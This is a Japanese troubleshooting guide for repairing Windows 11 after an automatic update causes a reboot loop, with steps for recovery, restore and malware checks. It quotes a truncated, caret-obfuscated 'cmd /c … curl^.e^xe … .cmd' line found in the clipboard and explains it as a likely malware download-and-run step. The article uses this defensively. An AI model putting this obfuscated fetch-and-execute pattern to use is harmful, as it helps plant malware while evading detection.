Windows Updateの自動更新で、突然Windows 11が強制再起動してしまい、その後PCが起動しなくなると「壊れたのでは?」と不安になります。さらにWordのクリップボード履歴に怪しいコマンドが残っていれば、マルウェア感染も心配になります。本記事では、こうした状況で何を確認し、どの順番で復旧作業と「詳細な復元(Advanced Restore)」を進めればよいかを、Windows 11初心者の方にもわかるように具体的な手順で解説します。
症状の整理:突然始まったWindows Updateと再起動ループ
まず、今回の典型的な状況を整理しておきます。
- 公式の更新履歴(例:「最終更新日 8/30」など)以降、ユーザーが「今すぐ更新」などを押していないのに、Windows Updateが自動でダウンロード・インストールを開始した。
- そのまま再起動まで進み、再起動後にWindows 11が正常に起動しない、あるいは再起動を繰り返す。
- Wordのクリップボード履歴に
cmd /c cd %PROGRAMDATA% & curl^.e^xe … uGaZrgyUFCP.cmdのような見慣れないコマンドが残っており、マルウェアではないかと不安。 - 「システムの復元」を実行したところ、「すべてのファイルを置き換えられなかった」といったエラーが表示された。
- もっと踏み込んだ「詳細な復元(Advanced Restore)」をしたいが、Windows 11に不慣れで手順がわからない。
ポイントは「Windows Updateの不具合」だけでなく、「マルウェアが同時に動いた可能性」も視野に入れて、OSの修復とセキュリティチェックを並行して進めることです。
まず確認すべきこと:Windowsは起動できるか?
最初の分岐はとてもシンプルです。「Windowsがデスクトップまで起動するかどうか」で、取るべき手順が大きく変わります。
Windows 11が起動できる場合
もし何とかデスクトップまでたどり着けるなら、最初に次の確認を行います。
- 適用された更新プログラムを確認する
- スタートボタン → 設定 → Windows Update → 更新の履歴 を開く。
- 「品質更新プログラム」「ドライバーの更新」「その他の更新」などの区分ごとに、インストール日とKB番号をメモする。
- 公式の更新履歴ページの「公開日」より後でも、ダウンロード済み更新が後からインストールされることはよくあります(バックグラウンドで準備が済んでいた場合など)。
- 再起動ループが継続するかを確認
- 数回再起動しても同じエラー画面や自動修復ループになる場合は、WinRE(Windows 回復環境)での修復を優先します。
Windows 11が起動しない/再起動ループになる場合
電源を入れても「自動修復を準備しています」「PCを診断しています」などの画面から先に進まない、あるいはブルースクリーン(青いエラー画面)が出て再起動を繰り返すケースでは、Windows 回復環境(WinRE)を起動して、そこから復旧を試みます。
以降の手順では、主にこのWinREから操作していきます。
Windows回復環境(WinRE)に入る具体的な方法
Windowsがまだ起動できる場合の入り方
デスクトップまで起動できる場合、もっとも安全なのは「高度なスタートアップ」からWinREに入る方法です。
- スタート → 設定 → システム → 回復 を開く。
- 回復オプションの「高度なスタートアップ」の欄で、[今すぐ再起動]をクリック。
- 再起動後、「オプションの選択」画面が表示されるので、ここからWinREの各種ツールに進めます。
あるいは、
- スタートメニューの電源ボタン → Shiftキーを押しながら [再起動]
でも同じ画面に入ることができます。
Windowsが起動しない場合の入り方
OSが正常に起動しない場合は、強制終了を繰り返すことで自動的にWinREを呼び出します。
- 電源ボタンを長押しして、PCを強制終了する。
- 再び電源を入れ、Windowsロゴやメーカーロゴが出たあたりで、再度長押しで強制終了。
- これを3〜5回繰り返すと、多くの機種で「自動修復を準備しています」「診断中です」と表示され、その後に「詳細オプション」リンクが出る。
- 詳細オプション → トラブルシューティング を選ぶと、WinREのメニューに入れる。
機種によっては、F11キー連打や専用リカバリボタンでも回復環境に入れることがありますが、最も汎用的なのは上記の強制終了を繰り返す方法です。
| 状況 | WinREの入り方 | 備考 |
|---|---|---|
| Windowsが起動できる | 設定 → システム → 回復 → 高度なスタートアップ → 今すぐ再起動 | 最も安全で推奨される方法 |
| サインイン画面まで出る | 右下の電源ボタン → Shiftを押しながら再起動 | パスワードがわからなくても使用可能 |
| Windowsが起動しない/ループする | 電源長押しで強制終了 → 起動 → 強制終了を3〜5回繰り返す | 「自動修復」から「詳細オプション」に進む |
WinREで実行する復旧ステップ:安全な順番
WinREの画面に入ったら、いきなり「このPCを初期状態に戻す」を選ばず、データを残しやすい順に試していきます。
事前準備:周辺機器をはずす
- USBメモリ、外付けHDD、プリンタ、ゲームコントローラーなど、マウスとキーボード以外の周辺機器はすべて外す。
- 外付け機器があると、誤ったドライブを初期化したり、起動順が変わってトラブルが悪化することがあります。
ステップ1:システムの復元を行う
- WinREのメニューで トラブルシューティング → 詳細オプション → システムの復元 を選択。
- 管理者アカウントを選び、パスワードを入力。
- 一覧からトラブルが発生する前の日付の復元ポイントを選ぶ。
- 必要に応じて「影響を受けるプログラムの検出」で、アンインストールされるソフトを確認。
- 確認画面で[完了]を押して復元を実行。
復元後、次のようなメッセージが出ることがあります。
- 「システムの復元は正常に完了しました」 … 基本的にはそのまま再起動して様子を見る。
- 「一部のファイルを置き換えられませんでした」などの警告 … 後述の節で詳しく解説しますが、部分的にでも復元されていれば改善するケースも多いので、まずは再起動して挙動を確認します。
ステップ2:スタートアップ修復(自動修復)
システムの復元で改善しない場合は、起動プログラムそのものを自動修復する機能を試します。
- WinREの トラブルシューティング → 詳細オプション → スタートアップ修復 を選択。
- 対象のOS(通常は「Windows 11」)を選ぶ。
- 自動で診断と修復が行われるので、そのまま完了まで待つ。
スタートアップ修復でブートローダーやシステムファイルの問題が解決されると、そのまま正常起動できることがあります。
ステップ3:コマンドプロンプトでシステムファイルをチェック
まだ起動しない場合は、WinREからコマンドプロンプトを使ってシステムファイルの整合性をチェックします。
- WinREで トラブルシューティング → 詳細オプション → コマンド プロンプト を開く。
- 以下のコマンドを順番に実行する(それぞれ完了まで待つ)。
sfc /scannow
DISM /Online /Cleanup-Image /RestoreHealth
必要に応じて、ディスク自体のエラーをチェックすることもできます。
chkdsk C: /f /r
※chkdskは時間がかかる場合がありますが、ディスクの不良セクタやファイルシステムの破損が原因の場合に有効です。
ステップ4:更新プログラムのアンインストール/以前のビルドに戻す
最近のWindows Updateが原因と思われる場合は、WinREから更新を削除する方法もあります。
- トラブルシューティング → 詳細オプション → 更新プログラムのアンインストール から、
- 最新の品質更新プログラムのアンインストール
- 最新の機能更新プログラムのアンインストール
- Windows 11の大型アップデート直後であれば、以前のバージョンに戻す(前のビルドに戻す)メニューが表示されることもあります。
ステップ5:このPCを初期状態に戻す(最終手段)
これまでの方法でどうしても起動できない場合、最後の手段としてWindowsを初期化します。
- WinREの トラブルシューティング → このPCを初期状態に戻す を選択。
- 「個人用ファイルを保持する」または「すべて削除する」を選ぶ。
- 画面の指示に従い、Windowsの再インストールを実行。
「個人用ファイルを保持する」を選んでも、インストール済みアプリや設定はほぼリセットされます。大事なデータを失いたくない場合は、外付けドライブにコピーできるものは事前に退避させておきましょう。
| 手順 | データ消失リスク | 難易度 | コメント |
|---|---|---|---|
| システムの復元 | 低(個人ファイルは基本残る) | 低〜中 | 最優先で試すべき方法 |
| スタートアップ修復 | 低 | 低 | 起動関連の不具合に有効 |
| コマンドプロンプト(sfc / DISM / chkdsk) | 低〜中 | 中 | システムファイルやディスクの論理エラーを修復 |
| 更新プログラムのアンインストール | 低 | 低 | 直近のWindows Updateが怪しいときに有効 |
| このPCを初期状態に戻す | 中〜高 | 中 | 最終手段。事前にバックアップ必須 |
「すべてのファイルを置き換えられなかった」エラーが出たとき
システムの復元で次のようなメッセージが表示されることがあります。
- 「システムの復元は完了しましたが、一部のファイルを置き換えられませんでした」
これは、
- 復元ポイント作成後に追加された一部のファイルやドライバーが、ロックされていて書き換えできなかった
- ディスクやシステムファイルに軽微な破損があり、一部の変更が適用できなかった
といったケースで起こりますが、だからといって復元が完全に無意味というわけではありません。まずは再起動して挙動を確認しましょう。
改善しない場合の追加対処としては、
- WinREのコマンドプロンプトから sfc /scannow → DISM を実行してから、再度システムの復元を試す。
- 別の日付の復元ポイントがあれば、より古い復元ポイントを選び直す。
- 必要に応じて chkdsk C: /f /r でディスクチェックを行う。
それでも復元が安定しない場合は、次の「詳細な復元(Advanced Restore)」を検討します。
より踏み込んだ「詳細な復元(Advanced Restore)」の考え方と手順
「詳細な復元(Advanced Restore)」は公式メニュー名ではありませんが、ここでは次のようなもう一段深い復旧方法の総称として扱います。
- システムイメージ(OS丸ごとバックアップ)からの復元
- クリーンインストール+バックアップからのデータ復元
- ファイル履歴やOneDriveからのファイル単位の復元
システムイメージでPC全体を復元する
もし以前に「システムイメージのバックアップ」や、サードパーティ製の「ディスクイメージ」を作成している場合は、それを使うのが最も確実な「Advanced Restore」です。
- バックアップを保存した外付けHDDやNASをPCに接続する。
- WinREを起動し、トラブルシューティング → 詳細オプション → システム イメージ回復(あるいはバックアップソフト独自の回復メニュー)を選ぶ。
- 画面の指示に従い、復元元のイメージと復元先ドライブ(通常はC:)を選択。
- 実行すると、イメージ作成時点の状態にCドライブ全体が戻るため、その後に追加したアプリや設定は消えるが、OSは安定した状態に戻る。
この方法は「元に戻る時点」がかなり前になることもありますが、Windows Updateやマルウェアの影響を一気に巻き戻せるという大きなメリットがあります。
クリーンインストール+データ復元という選択肢
復元ポイントもシステムイメージもない場合、
- Windows 11をクリーンインストールし直す
- ユーザーデータをバックアップからコピーし直す
という「きれいに作り直す」方法も、一種のAdvanced Restoreと考えられます。
- 別PCなどを使ってWindows 11のインストールメディア(USB)を作成。
- 問題のPCをUSBから起動し、セットアップ画面で「今すぐインストール」を選ぶ。
- 既存のWindowsパーティションを選択してインストール(必要に応じてクリーンインストール)。
- セットアップ完了後、外付けHDDやクラウド(OneDriveなど)からユーザーフォルダー(ドキュメント、ピクチャなど)をコピーし直す。
手間はかかりますが、マルウェアが深いところまで入り込んでいる可能性がある場合には、最も安心できる方法のひとつです。
ファイル履歴・OneDriveから個別ファイルを戻す
OS自体は何とか起動できるが、特定のファイルだけ壊れている・消えている場合は、次の方法でファイル単位の復元を行えます。
- エクスプローラーでファイルやフォルダを右クリック → プロパティ → 以前のバージョンタブから復元できる場合がある。
- OneDriveを使っている場合、OneDriveのバージョン履歴から過去のバージョンを復元できることがある。
| 復元方法 | 戻る範囲 | 必要な準備 | 向いているケース |
|---|---|---|---|
| システムの復元 | システム設定・ドライバー・一部アプリ | 復元ポイント | 軽度〜中程度の不具合 |
| システムイメージから復元 | OS+アプリ+設定を丸ごと | システムイメージのバックアップ | 大規模な不具合・マルウェア疑い |
| クリーンインストール+データ戻し | OSは新規、データはバックアップから | ユーザーデータのバックアップ | 根本的に環境をリセットしたい |
| ファイル履歴/OneDrive | 特定ファイル・フォルダ | 事前の同期・履歴 | ピンポイントなデータ復旧 |
クリップボードに残っていた怪しいcurlコマンドの正体
Wordのクリップボード履歴にあった
cmd /c cd %PROGRAMDATA% & curl^.e^xe … uGaZrgyUFCP.cmd
というコマンドは、構造から見てかなりマルウェア的な動きを連想させます。
cmd /c… コマンドプロンプトを起動し、指定コマンドを実行して終了する。cd %PROGRAMDATA%… %PROGRAMDATA%(通常はC:\ProgramData)に移動する。サービスや全ユーザー共通の設定が置かれる場所。curl^.e^xe…curl.exeをエスケープしながら書いたものと思われる。セキュリティソフトの検知や単純な文字列検索を避ける手口で使われる書き方。- 末尾の
uGaZrgyUFCP.cmd… ダウンロードしたスクリプトやバッチファイル名の一部と思われる。
典型的なシナリオとしては、
- どこかのサイトやメールに埋め込まれたスクリプトをコピーした。
- マクロ付きWord/Excelファイルや悪意のあるインストーラが、このようなコマンドを内部で実行した。
クリップボードに残っていたということは、何らかのタイミングでこのコマンド列がテキストとしてコピーされたのは確かですが、「実際に実行されたかどうか」までは判断できません。とはいえ、マルウェアの痕跡として扱う前提でチェックを進めるべきレベルです。
マルウェア疑いへの安全なチェックと駆除手順
1. ネットワークと他のPCを守る
- 念のため、問題のPCは一時的にLANケーブルを抜く・Wi-Fiをオフにする。
- USBメモリなどで他のPCとデータをやり取りする前に、必ずウイルススキャンを行う。
2. Microsoft Defender オフラインスキャンを実行する
Windows 11には、OSを一度シャットダウンしてから専用環境でスキャンする「Microsoft Defender オフラインスキャン」があります。常駐型のマルウェアやルートキットが疑われるときに有効です。
- Windowsが起動できる状態にする(必要なら前述の復旧手順を先に)。
- スタート → 設定 → プライバシーとセキュリティ → Windows セキュリティ → Windows セキュリティを開く。
- ウイルスと脅威の防止 を開き、スキャンのオプションをクリック。
- 一覧から Microsoft Defender オフライン スキャン を選択し、今すぐスキャンを実行。
- PCが再起動し、通常のWindowsとは別の環境でスキャンが実施される。完了後、結果が表示される。
3. フルスキャン・カスタムスキャンも実施する
オフラインスキャンに加えて、通常の環境での
- フルスキャン
- 必要に応じて、外付けHDDやUSBメモリを対象にしたカスタムスキャン
も実施し、不審な検出がないか確認します。
4. スタートアップ・スケジュールタスクを確認する
マルウェアは自動起動の仕組みに潜むことが多いため、次のチェックも行っておきましょう。
- タスクマネージャー(Ctrl+Shift+Esc) → スタートアップアプリタブで、見覚えのないアプリが有効になっていないか確認し、不要なものは無効にする。
- 設定 → アプリ → インストールされているアプリを、インストール日で並べ替え、不審なアプリがないか確認する。
- 必要に応じて、タスク スケジューラで不審な定期実行タスクがないかも確認する。
5. ブラウザ・Officeの設定も見直す
- ブラウザの拡張機能一覧から、心当たりのないものを削除する。
- WordやExcelのマクロ設定を「信頼できる場所以外のマクロを無効」にする。
6. 最後にパスワードを変更する
OSの復旧とマルウェアチェックが完了したら、念のため以下のような重要アカウントのパスワードを変更することをおすすめします。
- Microsoftアカウント
- 主要なメールアカウント
- インターネットバンキングやクレジットカード関連
- よく使うクラウドサービス(OneDrive、Google Driveなど)
同じパスワードを使い回している場合は、この機会にパスワードマネージャー+複雑なパスワードに移行しておくと安心です。
Windows Updateの自動再起動をコントロールする設定
今回のようなトラブルを一度経験すると、「勝手に再起動してほしくない」という気持ちが強くなります。Windows 11では完全な自動更新停止は難しいものの、「いつ再起動されるか」をある程度コントロールする設定は可能です。
アクティブ時間を正しく設定する
- 設定 → Windows Update を開く。
- アクティブ時間を、自分がPCを使う時間帯(例:9:00〜24:00など)に設定。
- アクティブ時間中は、Windowsが自動再起動をできるだけ避けるようになります。
更新前に通知を受け取る設定
- 設定 → Windows Update → 詳細オプションを開く。
- 「更新の通知」をオンにし、再起動が必要なときに事前に通知されるようにする。
Windows 11 Pro / Enterprise で自動更新ポリシーを変更する
Pro/Enterpriseエディションでは、ローカルグループポリシーを使って、更新の自動ダウンロード・自動インストールを制御できます(Homeには原則ありません)。
- Win + R で「ファイル名を指定して実行」を開き、
gpedit.mscと入力してEnter。 - コンピュータの構成 → 管理用テンプレート → Windows コンポーネント → Windows Update → Windows Update for Business または Windows Update の項目を開く。
- 自動更新を構成する を「有効」にし、オプションから「2 – ダウンロードとインストールを通知」を選択。
こうしておくと、更新プログラムが自動でダウンロード・インストールされるのではなく、通知を見てから手動で実行できるようになります。
| エディション | 主な対策 | 効果 |
|---|---|---|
| すべて(Home含む) | アクティブ時間の設定/更新通知の有効化 | 作業時間中の予期せぬ再起動を減らせる |
| Pro / Enterprise | グループポリシーで「通知のみ」に変更 | 更新のダウンロード・インストールを自分でタイミング管理できる |
トラブルを繰り返さないためのバックアップと予防策
最後に、今回のような「Windows Update+マルウェア疑い」という複合トラブルに備えるための、日常的な対策をまとめます。
システムイメージのバックアップを月1回は作成
- 外付けSSD/HDDを用意し、月1回程度、システムイメージを作成しておく。
- 万一のときには、その時点の状態に丸ごと戻せるため、復旧が格段に楽になります。
システムの保護(復元ポイント)を有効にする
- スタートで「復元ポイントの作成」と検索し、システムのプロパティを開く。
- システム保護タブで、Cドライブの保護を有効にする。
- 重要なアプリやドライバーを入れる前に、手動で復元ポイントを作成しておくと安心。
主要データは二重保存する
- ドキュメントや写真など重要ファイルは、OneDrive+外付けSSDなど、最低でも2箇所に保存する。
- ランサムウェア対策として、外付けHDDは常時接続せず、バックアップするときだけ接続する運用も有効です。
怪しいファイル・サイトに注意する
- メール添付のOfficeファイル(特にマクロ付き)や、不明な出どころのインストーラは極力開かない。
- ブラウザ拡張機能/フリーソフトのインストール時は、不要なオプション(ツールバーなど)をよく確認してオフにする。
まとめ:アップデートもセキュリティも「仕組み」で守る
Windows Updateが突然動き出し、強制再起動の結果としてWindows 11が起動しなくなると、誰でも不安になります。さらにWordのクリップボードに怪しいcurlコマンドが残っていれば、「PCが乗っ取られたのでは?」と感じても無理はありません。
しかし、手順を整理して一つずつ進めれば、
- WinREからのシステムの復元・スタートアップ修復・コマンドによる修復で起動を取り戻す
- 必要であればシステムイメージやクリーンインストールといった詳細な復元に進む
- 並行してDefenderオフラインスキャンやスタートアップの確認を行い、マルウェア疑いを潰していく
ことができます。
そして、いったん復旧できたら、
- Windows Updateの通知・アクティブ時間の設定
- 定期的なシステムイメージと復元ポイントの作成
- 重要データの二重保存
といった「仕組み」を整えることで、次に同じことが起きても、短時間で安全に復旧できるようになります。アップデートとセキュリティのどちらもあきらめる必要はありません。今回のトラブルをきっかけに、Windows 11の回復機能とバックアップ運用を見直してみてください。

コメント